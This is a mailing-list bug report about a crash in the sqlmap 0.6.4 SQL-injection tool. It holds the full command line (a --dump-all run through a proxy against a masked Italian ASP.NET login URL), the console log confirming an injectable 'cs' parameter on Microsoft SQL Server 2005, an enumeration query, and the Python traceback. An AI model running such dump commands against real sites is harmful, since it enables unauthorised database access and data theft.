[sqlmap-users] Bug in 0.6.4

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

radoen@vaio:~/sqlmap/NUOVO/sqlmap-dev$ sqlmap
--proxy=http://127.0.0.1:8118 --dump-all   -u
"http://xxxx.xxxx-xxxx.it/login.aspx?ReturnUrl=%2fDefault.aspx%3fcs%3d888%26al%3d0&cs=888&al=0"

    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
                      and Daniele Bellucci <dan...@gm...>

[*] starting at: 17:48:56

[17:48:56] [INFO] testing connection to the target url
[17:49:26] [WARNING] unable to connect to the target url or proxy,
sqlmap is going to retry the request
[17:49:40] [INFO] testing if the url is stable, wait a few seconds
[17:49:51] [INFO] url is stable
[17:49:51] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:49:55] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:49:55] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic
[17:49:59] [WARNING] Cookie parameter 'ASP.NET_SessionId' is not dynamic
[17:49:59] [INFO] testing if GET parameter 'cs' is dynamic
[17:50:05] [INFO] confirming that GET parameter 'cs' is dynamic
[17:50:15] [INFO] GET parameter 'cs' is dynamic
[17:50:15] [INFO] testing sql injection on GET parameter 'cs' with 0 parenthesis
[17:50:15] [INFO] testing unescaped numeric injection on GET parameter 'cs'
[17:50:49] [WARNING] unable to connect to the target url or proxy,
sqlmap is going to retry the request
[17:51:20] [INFO] confirming unescaped numeric injection on GET parameter 'cs'
[17:51:25] [INFO] GET parameter 'cs' is unescaped numeric injectable
with 0 parenthesis
[17:51:25] [INFO] testing if GET parameter 'al' is dynamic
[17:51:29] [WARNING] GET parameter 'al' is not dynamic
[17:51:29] [INFO] testing for parenthesis on injectable parameter
[17:51:44] [INFO] the injectable parameter requires 0 parenthesis
[17:51:44] [INFO] testing MySQL
[17:51:53] [WARNING] the back-end DMBS is not MySQL
[17:51:53] [INFO] testing Oracle
[17:52:06] [WARNING] the back-end DMBS is not Oracle
[17:52:06] [INFO] testing PostgreSQL
[17:52:11] [WARNING] the back-end DMBS is not PostgreSQL
[17:52:11] [INFO] testing Microsoft SQL Server
[17:52:16] [INFO] confirming Microsoft SQL Server
[17:52:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

[17:52:29] [INFO] fetching tables
[17:52:29] [INFO] fetching database names
[17:52:29] [INFO] fetching number of databases
[17:52:29] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
[17:52:29] [INFO] retrieved: [17:52:29] [ERROR] unhandled exception in
sqlmap/0.6.4, please copy the command line and the following text and
send by e-mail to sql...@li.... The developers
will fix it as soon as possible:

sqlmap version: 0.6.4
Python version: 2.7.1+
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 81, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 255, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 120, in action
    conf.dbmsHandler.dumpAll()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 1043, in dumpAll
    self.cachedTables = self.getTables()
  File "/usr/share/sqlmap/plugins/dbms/mssqlserver.py", line 233, in getTables
    dbs = self.getDbs()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 623, in getDbs
    count = inject.getValue(query, inband=False, expected="int")
  File "/usr/share/sqlmap/lib/request/inject.py", line 364, in getValue
    value = __goInferenceProxy(expression, fromUser, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 297, in
__goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields,
expressionFieldsList, payload, expected)
  File "/usr/share/sqlmap/lib/request/inject.py", line 100, in
__goInferenceFields
    output = __goInference(payload, expressionReplaced)
  File "/usr/share/sqlmap/lib/request/inject.py", line 60, in __goInference
    count, value = bisection(payload, expression, length=length)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
231, in bisection
    val = getChar(index)
  File "/usr/share/sqlmap/lib/techniques/blind/inference.py", line
101, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, limit)
TypeError: not enough arguments for format string

[*] shutting down at: 17:52:29

I use the last svn versione of sqlmap, downloaded in day 21/5/2011.

Good work
Radoen